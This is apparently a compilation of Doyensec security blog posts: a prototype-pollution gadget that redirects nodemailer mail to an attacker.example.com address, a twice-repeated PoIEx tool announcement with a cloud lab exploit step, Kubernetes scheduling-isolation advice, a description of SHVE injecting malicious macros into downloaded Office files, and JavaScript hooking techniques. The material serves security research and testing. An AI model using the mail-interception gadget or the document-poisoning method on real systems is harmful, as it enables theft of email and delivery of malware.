      "null_payload": {"cc": {}}
    },
    {
      "payload": {"bcc": "email@<URL>"},
      "description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",
      "null_payload": {"bcc": {}}
    }
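
Similarly, a minimal sketch of the cc gadget (hedged: whether the inherited property is honored depends on the nodemailer version; hosts and addresses are placeholders):

const nodemailer = require('nodemailer');

// Simulate the pollution performed through the vulnerable endpoint
Object.prototype.cc = 'attacker@attacker.example.com';

const transporter = nodemailer.createTransport({ host: 'smtp.example.com', port: 587 });
const mailOptions = { from: 'app@example.com', to: 'user@example.com', subject: 'Hello', text: 'Hi!' };

// mailOptions has no own `cc`, so the lookup falls through to Object.prototype
transporter.sendMail(mailOptions, (error, info) => console.log(error || info));

// Equivalent of the gadget's null_payload ("de-poisoning")
delete Object.prototype.cc;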
    

Gadget Found

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying and sharing new gadgets. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.

Introducing PoIEx - Points Of Intersection Explorer

We are releasing a previously internal-only tool to improve Infrastructure as Code (IaC) analysis and enhance Visual Studio Code with real-time collaboration during manual code analysis activities. We’re excited to announce that PoIEx is now available on GitHub.

Nowadays, cloud-oriented solutions are no longer a buzzword: cloud providers offer ever more intelligent infrastructure services, handling features ranging from simple object storage to complex tasks such as user authentication and identity and access management. With the growing complexity of cloud infrastructure, the interactions between application logic and infrastructure begin to play a critical role in ensuring application security.

With many recent high-profile incidents resulting from an insecure combination of web and cloud related technologies, focusing on the points where they meet is crucial to discover new bugs.

PoIEx is a new Visual Studio Code extension that aids testers in analyzing interactions between code and infrastructure by enumerating, plotting and connecting the so-called Points of Intersection.

Introducing the Point of Intersection - A novel approach to IaC-App analysis

A Point of Intersection (PoI) marks where the code interacts with the underlying cloud infrastructure, revealing connections between the implemented logic and the Infrastructure as Code (IaC) defining the configuration of the involved cloud services.

Enumerating PoIs is crucial while performing manual reviews to find hybrid cloud-web vulnerabilities exploitable by tricking the application logic into abusing the underlying infrastructure service.

PoIEx identifies and visualizes PoIs, allowing security engineers and cloud security specialists to better understand and identify security vulnerabilities in cloud-oriented applications.

PoIEx: Enhancing VSCode to support Code Reviews

PoIEx scans the application code and the IaC definition at the same time, leveraging Semgrep and custom rulesets, finds code sections that are IaC-relevant, and visualizes results in a nice and user-friendly view. Engineers can navigate the infrastructure diagram and quickly jump to the relevant application code sections where the selected infrastructure resource is used.

Example infrastructure diagram generation and PoIs exploration

If you use VSCode to audit large codebases, you may have noticed that all of its features are tailored towards the needs of the developer community. At Doyensec, we have solved this issue with PoIEx. The extension enhances VSCode with the features required to efficiently perform code reviews, such as advanced collaboration capabilities, note taking via the VSCode Comments API, and Semgrep integration, allowing it to also be used as a standalone Semgrep and project collaboration tool, without any of its IaC-specific features.

At Doyensec, we use PoIEx as a collaboration and review-enhancement tool.
Below we introduce the non-IaC related features, along with our use cases.

✍️ Notes Taking As Organized Threads

PoIEx adds commenting capabilities to VSCode. Users can place sticky notes at any code location without editing the codebase.

At Doyensec, we usually organize threads with a naming convention involving prefixes like: VULN, LEAD, TODO, etc. We have found that placing shared annotations directly on the codebase greatly improves efficiency when multiple testers are working on the same project.

Example notes usage with organized threads

In collaboration mode, members receive an interactive notification for every reply or thread creation, enabling real-time sync among the reviewers about leads, notes and vulnerabilities.

👨‍💻 PoIEx as a standalone Semgrep extension for VSCode

PoIEx also works as a standalone VSCode extension for Semgrep. It allows the user to scan the entire workspace and presents Semgrep findings nicely in the VSCode “Problems” tab.

Moreover, by right-clicking an issue, it is possible to flag it and update its status as ❌ false positive, 🔥 hot, or ✅ resolved. The status is synced in collaboration mode to avoid duplicating checks.

The extension settings allow the user to setup custom arguments for Semgrep. As an example we currently use --config /path/to/your/custom-semgrep-rules --metrics off to turn off metrics and set it use our custom rules.

The scan can be started from the extension side-menu and the results are explorable from the VS Code problems sub-menu. Users can use the built-in search functionality in a smart way to find interesting leads.

Example Semgrep results and listed PoIs exploration with emoji flagging

🎯 Project-oriented Design

PoIEx allows for real-time synchronization of findings and comments with other users. When using collaboration features, a MongoDB instance needs to be shared across all collaborators of the team.

The project-oriented design allows us to map projects and share an encryption key with the testers assigned to a specific activity. This design feature ensures that sensitive data is encrypted at rest.

Comments and scan results are synced to a MongoDB instance, while the codebase remains local and each reviewer must share the same version.

A Real-World Analysis Example - Solving Tidbits Ep.1 With PoIEx

In case you are not familiar with it, CloudSec Tidbits is our blogpost series showcasing interesting real-world bugs found by Doyensec during cloud security testing activities. The blog posts & labs can be found in this repository.

Episode 1 describes a specific type of vulnerability affecting the application logic when user-input is used to instantiate the AWS SDK client. Without proper checks, the user could be able to force the app to use the instance role, instead of external credentials, to interact with the AWS service. Depending on the functionality, such a flaw could allow unwanted actions against the internal infrastructure.

Below, we are covering the issue identification in a code review, as soon as the codebase is opened and explored with PoIEx.

Once downloaded and opened in VS Code, examine the codebase for Lab 1, by using PoIEx to run Semgrep and show the infrastructure diagram by selecting the main.tf file. The result should be similar to the following one.

The notifications on aws_s3_bucket.data_internal represent two findings for that bucket. By clicking on it, a new tab is opened to visualize them.

The first group contains PoIs and Semgrep findings, while the second group contains the IaC definition of the clicked entity.

In that case we see that there is an S3 PoI in app/web.go:52. Once clicked, we are redirected at the GetListObjects function defined at web.go#L50. While it is just listing the files in an S3 bucket, both the SDK client config and bucket name are passed as parameters in its signature.

A quick search for its usages will show the vulnerable code

//*aws config initialization
aws_config := &aws.Config{}

if len(imptdata.AccessKey) == 0 || len(imptdata.SecretKey) == 0 {
	fmt.Println("Using nil value for Credentials")
	aws_config.Credentials = nil
} else {
	fmt.Println("Using NewStaticCredentials")
	aws_config.Credentials = credentials.NewStaticCredentials(imptdata.AccessKey, imptdata.SecretKey, "")
}
//list of all objects
allObjects, err := GetListObjects(session_init, aws_config, *aws.String(imptdata.BucketName))

If the aws_config.Credentials is set to nilbecause of a missing key/secret in the input, the credentials provider chain will be used and the instance’s IAM role is assumed. In that case, the automatically retrieved credentials have full access to internal S3 buckets. Quickly jump to the TF definition from the S3 bucket results tab.

After the listing, the DownloadContent function is executed (at web.go line 129 ) and the bucket’s contents are exposed to the user.

At this point, the reviewer knows that if the function is called with an empty AWS Key or Secret, the import data functionality will end up downloading the content with the instance’s role, hence allowing internal bucket names as input.

To exploit the vulnerability, hit the endpoint /importData with empty credentials and the name of an internal bucket (solution at the beginning of Cloudsec Tidbits episode 2).

Stay Tuned!

This project was made with love on the Doyensec Research Island by Michele Lizzit for his master thesis at ETH Zurich under the mentoring of Francesco Lacerenza.

Check out PoIEx! Install the last release from GitHub and contribute with a star, bug reports or suggestions.

Introducing PoIEx - Points Of Intersection Explorer

We are releasing a previously internal-only tool that improves Infrastructure as Code (IaC) analysis and enhances Visual Studio Code with real-time collaboration during manual code analysis activities. We’re excited to announce that PoIEx is now available on GitHub.

Nowadays, cloud-oriented solutions are no longer a buzzword: cloud providers offer increasingly intelligent infrastructure services, handling features ranging from simple object storage to complex tasks such as user authentication and identity and access management. With the growing complexity of cloud infrastructure, the interactions between application logic and infrastructure begin to play a critical role in ensuring application security.

With many recent high-profile incidents resulting from insecure combinations of web- and cloud-related technologies, focusing on the points where they meet is crucial to discovering new bugs.

PoIEx is a new Visual Studio Code extension that aids testers in analyzing interactions between code and infrastructure by enumerating, plotting and connecting the so-called Points of Intersection.

Introducing the Point of Intersection - A novel approach to IaC-App analysis

A Point of Intersection (PoI) marks where the code interacts with the underlying cloud infrastructure, revealing connections between the implemented logic and the Infrastructure as Code (IaC) defining the configuration of the involved cloud services.

Enumerating PoIs is crucial while performing manual reviews to find hybrid cloud-web vulnerabilities exploitable by tricking the application logic into abusing the underlying infrastructure service.

PoIEx identifies and visualizes PoIs, allowing security engineers and cloud security specialists to better understand and identify security vulnerabilities in cloud-oriented applications.

PoIEx: Enhancing VSCode to support Code Reviews

PoIEx scans the application code and the IaC definition at the same time: leveraging Semgrep and custom rulesets, it finds IaC-relevant code sections and visualizes the results in a user-friendly view. Engineers can navigate the infrastructure diagram and quickly jump to the relevant application code sections where the selected infrastructure resource is used.

Example infrastructure diagram generation and PoIs exploration

If you use VSCode to audit large codebases, you may have noticed that all of its features are tailored towards the needs of the developer community. At Doyensec, we have solved this issue with PoIEx. The extension enhances VSCode with the features required to efficiently perform code reviews, such as advanced collaboration capabilities, note taking via the VS Code Comments API and integration with Semgrep. This also allows it to be used as a standalone Semgrep and project collaboration tool, without any of its IaC-specific features.

At Doyensec, we use PoIEx as a collaboration and review-enhancement tool.
Below, we introduce the non-IaC-related features, along with our use cases.

✍️ Note Taking As Organized Threads

PoIEx adds commenting capabilities to VSCode. Users can attach sticky notes to any code location without editing the codebase.

At Doyensec, we usually organize threads with a naming convention involving prefixes like: VULN, LEAD, TODO, etc. We have found that placing shared annotations directly on the codebase greatly improves efficiency when multiple testers are working on the same project.

Example notes usage with organized threads

In collaboration mode, members receive an interactive notification for every reply or thread creation, enabling real-time sync among the reviewers about leads, notes and vulnerabilities.

πŸ‘¨β€πŸ’» PoIEx as a standalone Semgrep extension for VSCode

PoIEx also works as a standalone VSCode extension for Semgrep. It allows the user to scan the entire workspace and presents Semgrep findings neatly in the VSCode “Problems” tab.

Moreover, by right-clicking an issue, it is possible to flag it and update its status as ❌ false positive, 🔥 hot or ✅ resolved. The status is synced in collaboration mode to avoid duplicating checks.

The extension settings allow the user to set up custom arguments for Semgrep. As an example, we currently use --config /path/to/your/custom-semgrep-rules --metrics off to turn off metrics and set it to use our custom rules.

The scan can be started from the extension side-menu and the results are explorable from the VS Code problems sub-menu. The built-in search functionality can then be used to quickly surface interesting leads.

Example Semgrep results and listed PoIs exploration with emoji flagging

🎯 Project-oriented Design

PoIEx allows for real-time synchronization of findings and comments with other users. When using collaboration features, a MongoDB instance needs to be shared across all collaborators of the team.

The project-oriented design allows us to map projects and share an encryption key with the testers assigned to a specific activity. This design feature ensures that sensitive data is encrypted at rest.

Comments and scan results are synced to a MongoDB instance, while the codebase remains local; each reviewer must work on the same version of the codebase.

A Real-World Analysis Example - Solving Tidbits Ep.1 With PoIEx

In case you are not familiar with it, CloudSec Tidbits is our blog post series showcasing interesting real-world bugs found by Doyensec during cloud security testing activities. The blog posts & labs can be found in this repository.

Episode 1 describes a specific type of vulnerability affecting the application logic when user input is used to instantiate the AWS SDK client. Without proper checks, a user may be able to force the app to use the instance role, instead of external credentials, to interact with the AWS service. Depending on the functionality, such a flaw could allow unwanted actions against the internal infrastructure.

Below, we cover how the issue can be identified during a code review, as soon as the codebase is opened and explored with PoIEx.

Once the Lab 1 codebase is downloaded and opened in VS Code, use PoIEx to run Semgrep and render the infrastructure diagram by selecting the main.tf file. The result should be similar to the following.

The notifications on aws_s3_bucket.data_internal represent two findings for that bucket. By clicking on it, a new tab is opened to visualize them.

The first group contains PoIs and Semgrep findings, while the second group contains the IaC definition of the clicked entity.

In that case, we see that there is an S3 PoI in app/web.go:52. Once clicked, we are redirected to the GetListObjects function defined at web.go#L50. While it just lists the files in an S3 bucket, both the SDK client config and the bucket name are passed as parameters in its signature.

A quick search for its usages shows the vulnerable code:

// AWS config initialization
aws_config := &aws.Config{}

if len(imptdata.AccessKey) == 0 || len(imptdata.SecretKey) == 0 {
	fmt.Println("Using nil value for Credentials")
	aws_config.Credentials = nil
} else {
	fmt.Println("Using NewStaticCredentials")
	aws_config.Credentials = credentials.NewStaticCredentials(imptdata.AccessKey, imptdata.SecretKey, "")
}
// list all objects
allObjects, err := GetListObjects(session_init, aws_config, *aws.String(imptdata.BucketName))

If aws_config.Credentials is set to nil because of a missing key/secret in the input, the credentials provider chain is used and the instance’s IAM role is assumed. In that case, the automatically retrieved credentials have full access to internal S3 buckets. Quickly jump to the TF definition from the S3 bucket results tab.

After the listing, the DownloadContent function is executed (at web.go line 129) and the bucket’s contents are exposed to the user.

At this point, the reviewer knows that if the function is called with an empty AWS Key or Secret, the import data functionality will end up downloading the content with the instance’s role, hence allowing internal bucket names as input.

To exploit the vulnerability, hit the endpoint /importData with empty credentials and the name of an internal bucket (solution at the beginning of CloudSec Tidbits episode 2).
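On the remediation side, one way to address the flaw is to fail closed whenever external credentials are missing, so that the SDK never falls back to the instance role. A minimal sketch, reusing the field names from the lab code above (the error message and handling are illustrative):

// Reject the request instead of silently falling back to the
// credentials provider chain (and thus to the instance's IAM role)
if len(imptdata.AccessKey) == 0 || len(imptdata.SecretKey) == 0 {
	return errors.New("importData: external AWS credentials are required")
}
aws_config.Credentials = credentials.NewStaticCredentials(imptdata.AccessKey, imptdata.SecretKey, "")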

Stay Tuned!

This project was made with love on the Doyensec Research Island by Michele Lizzit for his master’s thesis at ETH Zurich, under the mentorship of Francesco Lacerenza.

Check out PoIEx! Install the latest release from GitHub and contribute with a star, bug reports or suggestions.

Kubernetes Scheduling And Secure Design

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns. Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, admission controllers, network policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploitable to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced. By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

CloudsecTidbit
Attackers on a compromised pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The methods available to apply a scheduling strategy are discussed below.

Mechanisms for Workload Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted on that node.

Additionally, running multiple applications with different authorization levels on the same node may result in privileged pods sharing it with pods that mount PII data or that carry a different security risk level.

1. nodeSelector

Among the available constraints, nodeSelector is the simplest one: it operates by simply specifying the target node labels inside the pod specification.

Example pod spec

apiVersion: v1
kind: Pod
metadata:
  name: nodeselector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are all required (AND logic), hence scheduling will only happen on nodes satisfying all of them.

While it is very useful in low-complexity environments, it can easily become a bottleneck that leaves pods unschedulable when many selectors are specified and no node satisfies them. Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.

2. nodeName

If the nodeName field in the spec is set, the kube-scheduler ignores the pod and the kubelet on the named node attempts to run it.

In that sense, nodeName overrides other scheduling rules (e.g., nodeSelector, affinity, anti-affinity, etc.) since the scheduling decision is pre-defined.

Example pod spec

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

  • The pod will not run if the node in the spec is not running or if it lacks the resources to host it
  • Cloud environments like AWS’s EKS come with unpredictable node names

Consequently, it requires detailed management of the available nodes and of the resources allocated to each group of workloads, since the scheduling is pre-defined.

Note: de facto, such an approach forfeits all the computational-efficiency benefits of the scheduler, and it should only be applied to small, easily managed groups of critical workloads.

3. Affinity & Anti-affinity

The node affinity feature enables specifying rules for pod scheduling based on the characteristics or labels of nodes. Such rules can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods into specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either “preferred” (soft) or “required” (hard). If a rule is set as preferredDuringSchedulingIgnoredDuringExecution, it is a soft rule: the scheduler will try to adhere to it, but may not always do so, especially if adhering would make scheduling impossible or challenging. If a rule is set as requiredDuringSchedulingIgnoredDuringExecution, it is a hard rule: the scheduler will not schedule the pod unless the condition is met, which can leave the pod pending if the condition is never satisfied.

In particular, anti-affinity rules can be leveraged to protect critical workloads from sharing a node with non-critical ones. By doing so, the lack of computational optimization will not affect the entire node pool, but just the few instances that contain business-critical units.

Example of node affinity

apiVersion: v1
kind: Pod
metadata:
  name: node-affinity-example
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
      - weight: 1
        preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            - segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

Here the pod prefers nodes in a specific network segment (selected by label) and requires nodes whose workloadtype matches either p0wload or p1wload (a custom strategy).

Multiple operators are available; NotIn and DoesNotExist are the ones usable to obtain node anti-affinity. From a security standpoint, only hard rules that require the conditions to be respected matter. The preferredDuringSchedulingIgnoredDuringExecution configuration should be reserved for computational preferences that cannot affect the security posture of the cluster.

4. Inter-pod Affinity and Anti-affinity

Inter-pod affinity and anti-affinity can constrain which nodes the pods can be scheduled on, based on the labels of pods already running on that node.
As specified in the Kubernetes documentation:

“Inter-pod affinity and anti-affinity rules take the form ‘this pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more pods that meet rule Y’, where X is a topology domain like node, rack, cloud provider zone or region, or similar and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase
      topologyKey: kubernetes.io/hostname
In the podAntiAffinity case above, the pod will never be scheduled on a node (the topology domain set by the mandatory topologyKey field) where a pod labeled app=testdatabase is running.

It fits designs where some pods should be scheduled together or where the system must ensure that certain pods are never scheduled together. In particular, inter-pod rules allow engineers to define additional constraints within the same execution context, without creating further segmentation in terms of node groups. Nevertheless, complex affinity rules could leave pods stuck in a pending state.

5. Taints and Tolerations

Taints are the opposite of node affinity properties: they are applied to a node to make it repel pods, unless the pods explicitly tolerate the taints.

Tolerations are applied to pods and they allow the scheduler to schedule pods with matching taints. It should be highlighted that while tolerations allow scheduling, the decision is not guaranteed.

Each taint also defines an effect: NoExecute (evicts pods already running on the node), NoSchedule (hard rule) or PreferNoSchedule (soft rule). The approach is ideal for environments where strong isolation of workloads is required, and it allows the creation of custom node-selection rules that are not based solely on labels and leave no flexibility to pods that do not tolerate the taints.
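As a minimal sketch (node, key and value names are illustrative), a node reserved for critical workloads could be tainted, with only critical pods carrying the matching toleration:

# Illustrative: taint the reserved node first, e.g.
#   kubectl taint nodes node-critical-workload workloadtype=critical:NoSchedule
apiVersion: v1
kind: Pod
metadata:
  name: toleration-example
spec:
  containers:
  - name: nginx
    image: nginx:latest
  tolerations:
  - key: "workloadtype"
    operator: "Equal"
    value: "critical"
    effect: "NoSchedule"

Keep in mind that the toleration only allows the pod onto the tainted node; pairing taints with node affinity is what actually pins critical pods to the reserved pool.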

6. Pod Topology Spread Constraints

You can use topology spread constraints to control how pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.
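A brief sketch (labels are illustrative): the constraint below keeps replicas of the same app spread across distinct nodes, which also limits how many replicas a single compromised node can expose.

apiVersion: v1
kind: Pod
metadata:
  name: spread-example
  labels:
    app: web
spec:
  topologySpreadConstraints:
  - maxSkew: 1
    topologyKey: kubernetes.io/hostname
    whenUnsatisfiable: DoNotSchedule
    labelSelector:
      matchLabels:
        app: web
  containers:
  - name: nginx
    image: nginx:latest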

7. Not Satisfied? Custom Scheduler to the Rescue

Kubernetes by default uses the kube-scheduler, which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers a lot of options, there might be specific security requirements that the default scheduler does not know about. Writing a custom scheduler allows an organization to apply risk-based scheduling, for example to avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that (a minimal sketch follows the list):

  • Watches for unscheduled pods
  • Implements a scheduling algorithm to decide on which node the pod should run
  • Communicates the decision to the Kubernetes API server.
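As a hedged illustration only, not a production scheduler, the sketch below uses client-go to bind pending pods that opt in via spec.schedulerName to nodes whose hypothetical risk-tier label matches the pod’s; error handling and the watch loop a real scheduler needs are elided:

// Minimal risk-aware scheduler sketch (client-go; names are illustrative)
package main

import (
	"context"
	"fmt"

	corev1 "k8s.io/api/core/v1"
	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/client-go/kubernetes"
	"k8s.io/client-go/tools/clientcmd"
)

func main() {
	cfg, _ := clientcmd.BuildConfigFromFlags("", clientcmd.RecommendedHomeFile)
	cs, _ := kubernetes.NewForConfig(cfg)
	ctx := context.TODO()

	// Unscheduled pods that opted in with `schedulerName: risk-scheduler`
	pods, _ := cs.CoreV1().Pods("").List(ctx, metav1.ListOptions{
		FieldSelector: "spec.schedulerName=risk-scheduler,spec.nodeName=",
	})
	for _, pod := range pods.Items {
		// Naive policy: match the pod's declared tier to a reserved node pool
		nodes, _ := cs.CoreV1().Nodes().List(ctx, metav1.ListOptions{
			LabelSelector: fmt.Sprintf("risk-tier=%s", pod.Labels["risk-tier"]),
		})
		if len(nodes.Items) == 0 {
			continue // nothing suitable: leave the pod pending
		}
		// Communicate the decision to the API server via a Binding object
		_ = cs.CoreV1().Pods(pod.Namespace).Bind(ctx, &corev1.Binding{
			ObjectMeta: metav1.ObjectMeta{Name: pod.Name, Namespace: pod.Namespace},
			Target:     corev1.ObjectReference{Kind: "Node", Name: nodes.Items[0].Name},
		}, metav1.CreateOptions{})
	}
}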

Some examples of custom schedulers that can be adapted for this can be found in the following GitHub repositories: kubernetes-sigs/scheduler-plugins or onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics by Mateo Burillo (Sysdig). As mentioned in the talk, this is not for the faint of heart due to the complexity involved, and you might be better off sticking with the default scheduler unless you are already planning to build one.

Offensive Tips: Scheduling Policies are like Magnets

As described, scheduling policies can be used to attract or repel pods onto specific groups of nodes.

While a proper strategy reduces the blast radius of a compromised pod, there are still some aspects to take care of from the attacker’s perspective. In specific cases, the implemented mechanisms could be abused to:

  • Attract critical pods - A compromised node, or a role able to edit node metadata, could be abused to attract pods of interest to the attacker by manipulating the labels of a controlled node.
    • Carefully review roles and internal processes that could be abused to edit the metadata. Verify the possibility for internal threats to exploit the attraction by influencing or changing the labels and taints
  • Avoid rejection on critical nodes - If users are allowed to submit pod specs, or have indirect control over how they are dynamically built, the scheduling sections of the spec could be abused. An attacker able to submit pod specs could use scheduling preferences to jump onto a critical node.
    • Always review the scheduling strategy to find out the options allowing pods to land on nodes hosting critical workloads. Verify if the user-controlled flows allow adding them or if the logic could be abused by some internal flow
  • Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied strategy could allow a privileged attacker to craft pods to block legitimate workloads at the scheduling decision.
    • Look for a potential mix of labels usable to lock the scheduling on a node

Bonus Section: Node Labels Security

Normally, the kubelet is still able to modify the labels of its own node, potentially allowing a compromised node to tamper with them and trick the scheduler as described above.

A security measure can be applied with the NodeRestriction admission plugin. It denies label editing by the kubelet whenever the node-restriction.kubernetes.io/ prefix is present in the label.

Wrap-up: Time to Make the Scheduling Decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, such a design would not exploit Kubernetes’ capability to optimize computation.

The following examples represent some trade-off choices:

  • Isolate critical namespaces/workloads on their own node group
  • Reserve a node for critical pods of each namespace
  • Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads. Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risks:

  • Different teams, different trust level
    It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training or access. This diversity can introduce varying levels of risk.

  • Data being processed or stored
    Some pods may require mounting customer data or holding persistent secrets to perform their tasks. Sharing the node with less hardened workloads may expose that data to risk.

  • Exposed network services on the same node
    Any pod that exposes a network service increases its attack surface. Pods handling external-facing requests may suffer from this exposure and be more at risk of compromise.

  • Pod privileges and capabilities, or its assigned risk
    Some workloads may need some privileges to work or may run code that by its very nature processes potentially unsafe content or third-party vendor code. All these factors can contribute to increasing a workload’s assigned risk.

Once the set of risks within the environment has been identified, decide the isolation level for teams/data/network traffic/capabilities. Grouping them, if they are part of the same process, could do the trick.

At that point, the number of workloads in each isolation group can be evaluated and addressed by mixing the scheduling strategies described above, according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.

Office Documents Poisoning in SHVE

Hello, folks! We’re back with an exciting update on Session Hijacking Visual Exploitation (SHVE) that introduces an insidious twist to traditional exploitation techniques using Office documents. We all know how Office documents laced with macros have been a longstanding entry point for infiltrating systems. SHVE now takes a step further by leveraging XSS vulnerabilities and the inherent trust users have in websites they regularly visit.

Our newest feature integrates the concept of Office document poisoning. Here’s how it works: SHVE allows you to upload templates for the .docm, .pptm, and .xlsm formats. Whenever a victim of SHVE goes to download one of these document types, the tool automatically intercepts it and injects the malicious macros into the file before it is downloaded. What makes this technique particularly sneaky is that the document appears completely normal to the user, maintaining the original content and layout. However, in the background, it executes the malicious payload, unbeknownst to the user.

Office-Poisoning

This approach capitalizes on two critical aspects: the trust users have in documents they download from legitimate websites they visit, and the inherent dangers of macros embedded within Office documents. By combining these two elements, we create a subtle vector for delivering malicious payloads. It’s the wolf in sheep’s clothing, where everything looks as it should be, but the danger lurks within.

To provide a clear demonstration of this technique, we’ve prepared a video illustrating this Office document poisoning in action. Witness how a seemingly innocent download can turn into a nightmare for the end user.

As security researchers and ethical hackers, we need to constantly evolve and adapt our methods. With this update, SHVE not only allows for the exploitation of XSS vulnerabilities but also cleverly abuses the trust mechanisms users have built around their daily digital interactions. This enhancement is not just a step forward in terms of technical capability, but also a reminder of the psychological aspects of security exploitation.

We’re eager to see how the community will leverage these new features in their penetration testing and red teaming engagements. As always, we welcome contributions, and we’re looking forward to your feedback and insights. Stay safe, and happy hacking!

Client-side JavaScript Instrumentation

There is a ton of code that is not worth your time and brain power. Binary reverse engineers commonly skip straight to the important code by using ltrace, strace, or Frida. You can do the same for client-side JavaScript using only common browser features. This will save time, make testing more fun and help keep your attention span available for the code that deserves your focus.

This blog introduces my thinking process and practical methods for instrumenting client-side JavaScript. These processes have helped me find deeply embedded bugs in complicated codebases with relative ease. I have been using many of these tricks for so long that I implemented them in a web extension called Eval Villain. While I will introduce you to some of Eval Villain’s brand new features, I will also show how to get the same results without Eval Villain.

General Method and Thinking

Testing an application often raises questions as to how the application works. The client must know the answers to some of these questions if the application is to function. Consider the following questions:

  • What parameters does the server accept?
  • How are parameters encoded/encrypted/serialized?
  • How does the wasm module affect the DOM?
  • Where are the DOM XSS sinks and what sanitization is being applied?
  • Where are the post message handlers?
  • How is cross-origin communication between ads being accomplished?

For the web page to work, it needs to know the answers to these questions. This means we can find our answers in the JavaScript too. Notice that each of these questions implies the use of particular JavaScript functions. For example, how would the client implement a post message handler without ever calling addEventListener? So “Step 1” is hooking these interesting functions, verifying that the use case is what we are interested in, and tracing back. In JavaScript, it would look like this:

(() => {
    const orig = window.addEventListener;
    window.addEventListener = function(a, b) {
        if (a === "message") {
            console.log("postMessage handler found");
            console.log(b); // You can click the output of this to go directly to the handler
            console.trace(); // Find where the handler was registered.
        }
        return orig(...arguments);
    }
})();

Just pasting the above code in the console will work if the handler has not already been registered. However, it is crucial to hook the function before it’s even used. In the next section I will show a simple and practical way to always win that race.

Hooking native JavaScript is “Step 1”. This often helps you find interesting code. Sometimes you will want to instrument that code too, but it’s non-native. This requires a different method that will be covered in the “Step 2” section.

Step 1: Hooking native JavaScript

Build your own Extension

While you can use one of many web extensions that will add arbitrary JavaScript to the page, I don’t recommend it. These extensions are often buggy, have race conditions and are difficult to develop in. In most cases, I find it easier to just write my own extension. Don’t be daunted, it is really easy. You only need two files and I already made them for you here.

To load the code in Firefox go to about:debugging#/runtime/this-firefox in the URL bar, click Load Temporary Add-on and navigate to the manifest.json file in the top directory of the extension.

For chrome, go to chrome://extensions/, enable developer mode in the right side and click load unpacked.

The extension should show up in the addon list, where you can quickly enable or disable it. When enabled, the script.js file will load in every web page. The following lines of code log all input to document.write.

	/*********************************************************
	 ***  Your code goes here to run in the page's scope   ***
	 *********************************************************/

	// example code to dump all arguments to document.write
	document.write = new Proxy(document.write, {
		apply: function(_func, _doc, args) {
			console.group(`[**] document.write.apply arguments`);
				for (const arg of args) {
					console.dir(arg);
				}
			console.groupEnd();
			return Reflect.apply(...arguments);
		}
	});

Temporarily loaded web extension hooks document.write

Replace those lines of code with whatever you want. Your code will run in every page and frame before the page has the opportunity to run its own code.

How it works

The boilerplate uses the manifest file to register a content script. The manifest tells the browser that the content script should run in every frame and before the page loads. Content scripts do not have direct access to the scope of the page they are loaded into, but they do have direct access to the DOM. So the boilerplate code just adds a new script into the page’s DOM. A CSP can prohibit this, so the extension checks that it worked. If a CSP does block you, just disable the CSP with browser configs, a web extension or an intercepting proxy.

Notice that the instrumentation code ultimately ends up with the same privileges as the website, so your code will be subject to the same restrictions as the page, such as the same-origin policy.
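For reference, a minimal sketch of such a content script is shown below; it assumes the manifest registers it with "run_at": "document_start" and "all_frames": true, which is essentially what the linked boilerplate does.

// content.js - copies your hooks into the page's own scope before any
// page script runs. Inline script elements execute synchronously on append.
(() => {
    const hooks = () => {
        // ...your instrumentation goes here, e.g. the document.write proxy above...
    };
    const s = document.createElement('script');
    s.textContent = `(${hooks})();`;
    document.documentElement.appendChild(s); // runs immediately
    s.remove(); // tidy up; the code has already executed
})();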

Async and Races

